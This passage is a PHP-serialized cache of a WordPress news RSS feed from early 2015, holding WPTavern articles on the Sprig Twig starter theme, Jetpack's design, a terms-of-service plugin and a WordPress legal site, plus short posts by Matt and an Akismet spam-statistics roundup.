actually make money by attracting loyal subscribers willing to pay for high-value content.</p>\n<p>The formula for making money will change. The key for successful independent journalism won&#8217;t be about being first, or dominating search, or pageview quotas. Too many in big media have ignored that <em>elasticity of substitution</em> measurement Ben highlights.</p>\n<p>Journalism is changing, and I agree with Ben Thompson that &#8220;The Daily Dish will in the long run be remembered not as the last of a dying breed but as the pioneer of a new, sustainable journalism.&#8221;</p>\n<p>Those journalists that can create what others cannot will have a formula for publishing success, and soon enough the tools will catch up to allow them to do what they do best: create great content.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 Feb 2015 22:21:23 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Brian Krogsgard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:22;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"WPTavern: Sprig: A WordPress Starter Theme that Features the Twig Templating Engine\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37053\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:92:\"http://wptavern.com/sprig-a-wordpress-starter-theme-that-features-the-twig-templating-engine\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4167:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/sprig.png\" rel=\"prettyphoto[37053]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/sprig.png?resize=857%2C390\" alt=\"sprig\" class=\"aligncenter size-full wp-image-38303\" /></a></p>\n<p>Those who are new to WordPress theming are often confused by the mixture of PHP and HTML markup in templates. It&#8217;s easy to accidentally break theme functionality when everything is placed in the same file.</p>\n<p>For that reason, there&#8217;s a strong contingency of developers who prefer to integrate the <a href=\"http://twig.sensiolabs.org/\" target=\"_blank\">Twig</a> PHP templating engine with WordPress, using a starter theme or via plugins like <a href=\"https://wordpress.org/plugins/twigpress/\" target=\"_blank\">TwigPress</a>, <a href=\"https://wordpress.org/plugins/timber-library/\" target=\"_blank\">Timber</a>, or the like. Fans of Twig appreciate its concise syntax and find that it makes templates more readable.</p>\n<p><a href=\"http://sprigwp.com/\" target=\"_blank\">Sprig</a> is a new Twig-based starter theme for WordPress created by developer <a href=\"http://zach-adams.com/\" target=\"_blank\">Zach Adams</a>. The theme incorporates the power and flexibility of Twig templating to speed up development and make WordPress templates easier to edit.</p>\n<p>Here&#8217;s an example of what the WordPress loop looks like in Sprig:</p>\n<pre class=\"brush: php; light: true; title: ; notranslate\">{% for post in posts() %}\n    {% include \'content/content-excerpt.twig\' %}\n{% endfor %}</pre>\n<p>For those who have never worked with a templating engine, the syntax may look rather unfamiliar, but the advantage is that it allows you to separate the necessities of getting/manipulating your data and rendering it out. Below is an example of the WordPress loop with arguments:</p>\n<pre class=\"brush: php; light: true; title: ; notranslate\">\n{% for post in posts({\n    \'post_type\':\'post\',\n    \'posts_per_page\':4\n}) %}\n    {% include \'content/content-excerpt.twig\' %}\n{% endfor %}</pre>\n<p>&nbsp;</p>\n<h5>Sprig Features</h5>\n<p>Sprig utilizes Bower for frontend package management. It comes pre-loaded with either <a href=\"https://github.com/zach-adams/sprig\" target=\"_blank\">Bootstrap</a> or <a href=\"https://github.com/zach-adams/sprig-foundation\" target=\"_blank\">Foundation</a> to get started. Sprig uses <a href=\"http://gulpjs.com/\" target=\"_blank\">Gulp</a> to automate tasks such as compiling, concatenating, and minifying CSS and Javascript.</p>\n<p>The theme was developed using the best parts of <a href=\"http://underscores.me/\" target=\"_blank\">Underscores</a>, <a href=\"http://roots.io/starter-theme/\" target=\"_blank\">Roots</a>, and <a href=\"https://wordpress.org/plugins/twigpress/\" target=\"_blank\">TwigPress</a>, which bring in a number of additional functions and scripts useful for theme development.</p>\n<h3>Does Twig Introduce a New Layer of Abstraction?</h3>\n<p>The main argument some theme developers have against using a templating engine like Twig is that it introduces a new layer of abstraction, as well as another thing to learn on top of WordPress&#8217; usual way of structuring template files. Some believe that the <a href=\"http://en.wikipedia.org/wiki/Separation_of_concerns\" target=\"_blank\">separation of concerns</a> prohibits a theme developer from gaining a true understanding of how WordPress works.</p>\n<p>Adams clearly states that the purpose of Sprig is to help theme developers spend less time wading through template markup code and instead focus their efforts on creating beautiful themes. The Twig templating engine may not be your cup of tea, but many developers find that it helps them produce cleaner template code that is easier to reuse.</p>\n<p>If <a href=\"http://sprigwp.com/\" target=\"_blank\">Sprig</a> helps get you from here to there faster, then it might be worth incorporating into your theme development workflow. Check out the full <a href=\"https://github.com/zach-adams/sprig\" target=\"_blank\">documentation on GitHub</a>. The project is still under active development and Adams recommends you test Sprig heavily before using it in production.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 Feb 2015 20:31:04 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:23;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:80:\"WPTavern: Part 1: George Stephanis on Why Jetpack is Not a Collection of Plugins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38269\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:89:\"http://wptavern.com/part-1-george-stephanis-on-why-jetpack-is-not-a-collection-of-plugins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2836:\"<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/JetpackPluginCollectionFeaturedImage.png\" rel=\"prettyphoto[38269]\"><img class=\"size-full wp-image-38279\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/JetpackPluginCollectionFeaturedImage.png?resize=638%2C200\" alt=\"Jetpack Plugin Collection Featured Image\" /></a>photo credit: <a href=\"https://www.flickr.com/photos/northbaywanderer/121971388/\">northbaywanderer</a> &#8211; <a href=\"http://creativecommons.org/licenses/by-sa/2.0/\">cc</a>\n<p>George Stephanis, who is a member of the Jetpack Pit Crew, published a post over the weekend that explains why <a title=\"http://stephanis.info/2015/01/31/why-jetpack-isnt-a-collection-of-plugins-part-the-first/\" href=\"http://stephanis.info/2015/01/31/why-jetpack-isnt-a-collection-of-plugins-part-the-first/\">Jetpack is not a collection of plugins</a>. According to Stephanis, dependency management in WordPress sucks. In a nutshell, a dependency is when a library, framework, component, theme, or plugin requires the existence of another to function. He gives a practical example of dependencies that highlights how quickly things could get messy.</p>\n<blockquote><p>Now, if <strong>Likes</strong>, <strong>Single Sign On</strong>, <strong>After the Deadline</strong>, <strong>Post by Email</strong> and others were their own plugins, and connected to a separate <strong>Jetpack Core</strong> plugin, versioning gets tricky.  It could work, in theory, if every plugin is kept up to date, always and forever.  But the instant that the user is using, say, an outdated version of <strong>Subscriptions</strong> with an outdated <strong>Jetpack Core</strong> (which work perfectly together), and then installs the up-to-date <strong>WP.me Shortlinks</strong> plugin, things could break because <strong>WP.me Shortlinks</strong> expects a more up-to-date <strong>Jetpack Core</strong>.</p>\n<p>So you go ahead and update <strong>Jetpack Core</strong> to current, but now <strong>Subscriptions</strong> — which used to work perfectly — now breaks because there was a method change in <strong>Jetpack Core</strong>, that is fixed in the up-to-date version of <strong>Subscriptions</strong>, but the user isn’t running the up-to-date version.  Horrible UX.</p></blockquote>\n<p>He goes on to describe the installation flow for a plugin that needs Jetpack Core to function. A plugin that depends on Jetpack Core adds at least four additional steps to the installation flow.</p>\n<p>It&#8217;s a good article that answers the technical side of a commonly asked question. It also gives insight to those who may be thinking of creating alternatives to Jetpack using a similar model. In part two of the series, Stephanis plans to write about the variety of other reasons Jetpack is not a collection of plugins.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 Feb 2015 17:46:14 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:24;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"WPTavern: How to Automatically Create Terms of Service and Privacy Policy Documents\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38257\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:93:\"http://wptavern.com/how-to-automatically-create-terms-of-service-and-privacy-policy-documents\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3716:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/AutoTermsOfServicePluginFeaturedImage.png\" rel=\"prettyphoto[38257]\"><img class=\"aligncenter size-full wp-image-38262\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/AutoTermsOfServicePluginFeaturedImage.png?resize=838%2C272\" alt=\"Auto Terms of Service Plugin Featured Image\" /></a></p>\n<p>If you own or operate a business and need a Terms of Service, Privacy, or various other legal documents, check out the <a title=\"https://github.com/Automattic/legalmattic\" href=\"https://github.com/Automattic/legalmattic\">Legalmattic repository</a> on Github. In 2014, Automattic open sourced all of its legal documents, including <a title=\"http://wptavern.com/automattic-open-sources-its-dmca-process-docs-on-github\" href=\"http://wptavern.com/automattic-open-sources-its-dmca-process-docs-on-github\">its DMCA takedown notice</a>. If you choose an Automattic legal document as a foundation to write your own, consider using the <a title=\"https://wordpress.org/plugins/auto-terms-of-service-and-privacy-policy/\" href=\"https://wordpress.org/plugins/auto-terms-of-service-and-privacy-policy/\">Auto Terms of Service and Privacy Policy plugin. </a></p>\n<p>Created by <a title=\"http://tourkick.com/\" href=\"http://tourkick.com/\">Clifford Paulick</a>, this plugin places the information entered into a version of Automattic&#8217;s <a href=\"http://en.wordpress.com/tos/\" rel=\"nofollow\">Terms of Service</a> and <a href=\"http://automattic.com/privacy/\" rel=\"nofollow\">Privacy Policy</a>, both available under the <a href=\"http://creativecommons.org/licenses/by-sa/3.0/\" rel=\"nofollow\">Creative Commons Sharealike</a> license. The documents are modified to exclude specifics to Automattic, such as mentions of Jetpack, WordPress.com, and VIP. Each document has generic language that can apply to most sites and service providers, including single sites, subscription sites, blog networks, and others.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/AutoTermsOfServicePluginSettings.png\" rel=\"prettyphoto[38257]\"><img class=\"size-full wp-image-38258\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/AutoTermsOfServicePluginSettings.png?resize=784%2C859\" alt=\"Add Your Company Info\" /></a>Add Your Company Info\n<p>Configuration is as simple as placing company information into the appropriate fields. Once entered, you&#8217;ll need to turn on the Display setting at the top to enable the three different shortcodes.</p>\n<ul>\n<li>[my_terms_of_service_and_privacy_policy]</li>\n<li>[my_terms_of_service]</li>\n<li>[my_privacy_policy]</li>\n</ul>\n<p>Here&#8217;s what the Tavern terms of service page looks like using the terms of service shortcode.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/AutoTermsOfServicePluginResult.png\" rel=\"prettyphoto[38257]\"><img class=\"size-full wp-image-38259\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/AutoTermsOfServicePluginResult.png?resize=731%2C826\" alt=\"Tavern Terms of Use Page\" /></a>Tavern Terms of Use Page\n<p>The plugin works as advertised and is a convenient way to provide legal documents if you&#8217;re a service provider like Automattic. However, if you need to fine tune the results, you can either copy the output from the shortcode and paste it into the page or use the source document from the <a title=\"https://github.com/Automattic/legalmattic\" href=\"https://github.com/Automattic/legalmattic\">Legalmattic repository</a>. While Automattic&#8217;s documents give you a head start, it&#8217;s probably still a good idea to seek legal counsel to review and edit them so they&#8217;re specifically tailored to your business.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 Feb 2015 17:28:56 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:25;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"WPTavern: Richard Best Launches New Website Devoted to WordPress Legal Topics\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38247\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"http://wptavern.com/richard-best-launches-new-website-devoted-to-wordpress-legal-topics\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2361:\"<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/WPandLegalStuffFeaturedImage.png\" rel=\"prettyphoto[38247]\"><img class=\"size-full wp-image-38254\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/WPandLegalStuffFeaturedImage.png?resize=639%2C300\" alt=\"WP and Legal Stuff Featured Image\" /></a>photo credit: <a href=\"https://www.flickr.com/photos/c_nilsen/16359004332/\">c_nilsen</a> &#8211; <a href=\"http://creativecommons.org/licenses/by-nc-sa/2.0/\">cc</a>\n<p>Over the weekend, I stumbled across a new resource called <a title=\"http://wpandlegalstuff.com/\" href=\"http://wpandlegalstuff.com/\">WP and Legal Stuff </a>run by <a title=\"http://wpandlegalstuff.com/about/\" href=\"http://wpandlegalstuff.com/about/\">Richard Best</a>, a qualified lawyer in New Zealand, England, and Wales. The site focuses on legal matters related to WordPress and open source. Recent articles include:</p>\n<ul>\n<li><a title=\"http://wpandlegalstuff.com/using-wordpress-trademarks-business-product-service/\" href=\"http://wpandlegalstuff.com/using-wordpress-trademarks-business-product-service/\">Using the WordPress trademarks for your business, product or service</a></li>\n<li><a title=\"http://wpandlegalstuff.com/gpl-wpscan-vane/\" href=\"http://wpandlegalstuff.com/gpl-wpscan-vane/\">The GPL and the story of WPScan and Vane</a></li>\n<li><a title=\"http://wpandlegalstuff.com/automattic-open-licensing-open-data/\" href=\"http://wpandlegalstuff.com/automattic-open-licensing-open-data/\">Automattic, open licensing and open data</a></li>\n</ul>\n<p>His take on <a title=\"http://wpandlegalstuff.com/understanding-gpl-licensing-wordpress/\" href=\"http://wpandlegalstuff.com/understanding-gpl-licensing-wordpress/\">understanding the GPL licensing of WordPress</a> is a great primer for anyone not familiar with how it works. While Best does not give legal advice through the site, he provides an interesting perspective since most of the people who participate in WordPress legal discussions are not lawyers.</p>\n<p>WP and Legal Stuff is a unique site and one of the few to cover WordPress legal matters on a routine basis. I highly suggest you subscribe to <a title=\"http://wpandlegalstuff.com/feed/\" href=\"http://wpandlegalstuff.com/feed/\">his RSS feed</a> so you don&#8217;t miss his next post on WordPress themes, the GPL, and the conundrum of derivative works.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 Feb 2015 16:37:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:26;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:24:\"Matt: Tech is Ridiculous\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44640\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"http://ma.tt/2015/02/tech-is-ridiculous/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:433:\"<blockquote><p>Yo&#8217;s Law: &#8220;in the 21st century tech industry, satire and reality are not merely indistinguishable but actually interchangeable.&#8221;</p></blockquote>\n<p>From Jon Evans&#8217; <a href=\"http://techcrunch.com/2015/01/24/this-industry-is-still-completely-ridiculous/\">This Industry Is Still Completely Ridiculous</a>, a hilarious article with a conclusion (the ridiculous stuff is worth it) I agree with.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 01 Feb 2015 22:12:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:27;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"Akismet: January 2015 Stats Roundup\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"http://blog.akismet.com/?p=1777\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"http://blog.akismet.com/2015/02/01/january-2015-stats-roundup/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3884:\"<p>January has been a slow and steady month in Akismet-land. Whereas <a href=\"http://blog.akismet.com/2014/12/01/november-stats-roundup/\">in</a> <a href=\"http://blog.akismet.com/2014/10/01/september-stats-roundup/\">months</a> <a href=\"http://blog.akismet.com/2014/11/03/october-stats-roundup/\">prior</a>, we&#8217;ve broken daily spam records, in January the spammers took it easy and we never saw a day with over 300 million spam comments caught.</p>\n<div id=\"attachment_1778\" class=\"wp-caption alignnone\"><img class=\"size-large wp-image-1778\" src=\"https://akismet.files.wordpress.com/2015/02/akismet-spam-and-ham-stats-january-2015.png?w=700&h=438\" alt=\"graph of akismet spam and ham daily stats january 2015\" /><p class=\"wp-caption-text\">The busiest day in January was the 4th, with almost 257 million comments, and the slowest was the 29th with just over 174 million comments.</p></div>\n<p>The <strong>total number of spam comments caught in January was a mere 6,586,661,000</strong> &#8211; compare that to the over 10 billion comments in December,<strong> that&#8217;s a drop of 35%</strong>. We did have more comments this month than the same time last year &#8211; 5% more.</p>\n<div id=\"attachment_1780\" class=\"wp-caption alignright\"><img class=\"size-medium wp-image-1780\" src=\"https://akismet.files.wordpress.com/2015/02/antique-map-of-the-world.jpg?w=300&h=211\" alt=\"Antique map of the world\" width=\"300\" height=\"211\" /><p class=\"wp-caption-text\">This image, “<a href=\"https://www.flickr.com/photos/38703275@N06/6884641242\">Old Map (90)</a>” by <a href=\"https://www.flickr.com/photos/38703275@N06/\">rosario fiore</a>, is licensed under <a href=\"https://creativecommons.org/licenses/by-nd/2.0/\">CC BY-ND 2.0</a></p></div>\n<p>Let&#8217;s put this number in perspective. The latest figures for the world population were published in 2013 by the <a href=\"http://data.worldbank.org/\">world bank</a>, and the number was just over 7 billion.</p>\n<p>If we wrote down each spam comment caught this month on a piece of paper, and handed out each of these notes to one person in the world, we&#8217;d have enough people on earth to hold all of the papers. In fact, we&#8217;d have some people left over that didn&#8217;t need to hold a piece of paper.</p>\n<p>In contrast <strong>there were only 157,555,500 legitimate comments that came through</strong> this month. <strong>Legitimate comments account for about 2%</strong> of all the content Akismet sees come through.</p>\n<p>If we wrote down each legitimate comment we got this month on a piece of paper and gave each to one person, we&#8217;d need just 2% of the world population in order to hold them all.</p>\n<p>As for Akismet&#8217;s uptime: there were no service interruptions this month. You can find information about any performance issues on this blog, via <a href=\"https://twitter.com/akismet\">Twitter</a>, and on this <a href=\"http://status.automattic.com/9931/136079/Akismet-API\">status page</a>.</p>\n<p>You may have also seen a drop in spam comments this month on your own blog. If you are having any issues with spam or with Akismet, please feel free to <a href=\"http://akismet.com/contact/\">contact us</a>, we&#8217;re happy to help <span class=\"wp-smiley wp-emoji wp-emoji-mrgreen\" title=\":mrgreen:\">:mrgreen:</span>.</p>\n<p><em>This post is part of a monthly series summarizing some stats and figures from the Akismet universe. Feel free to browse <a href=\"http://blog.akismet.com/category/monthly-roundup/\">all of the posts in the series</a>.</em></p><br />  <a rel=\"nofollow\" href=\"http://feeds.wordpress.com/1.0/gocomments/akismet.wordpress.com/1777/\"><img alt=\"\" border=\"0\" src=\"http://feeds.wordpress.com/1.0/comments/akismet.wordpress.com/1777/\" /></a> <img alt=\"\" border=\"0\" src=\"http://pixel.wp.com/b.gif?host=blog.akismet.com&blog=116920&post=1777&subd=akismet&ref=&feed=1\" width=\"1\" height=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 01 Feb 2015 16:57:09 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"Valerie\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:28;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"Matt: Federated Wikipedia\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44622\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:41:\"http://ma.tt/2015/01/federated-wikipedia/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:475:\"<p><a href=\"http://blog.jonudell.net/2015/01/22/a-federated-wikipedia/\">A federated Wikipedia by Jon Udell</a> talks about the ossification happening in the Wikipedia community, caused in part by its attachment to rules that were created with the best of intentions. All open source communities, including <a href=\"http://wordpress.org/\">WordPress</a>, have to be vigilant against this. Sometimes we have to throw out what worked before to create what will work 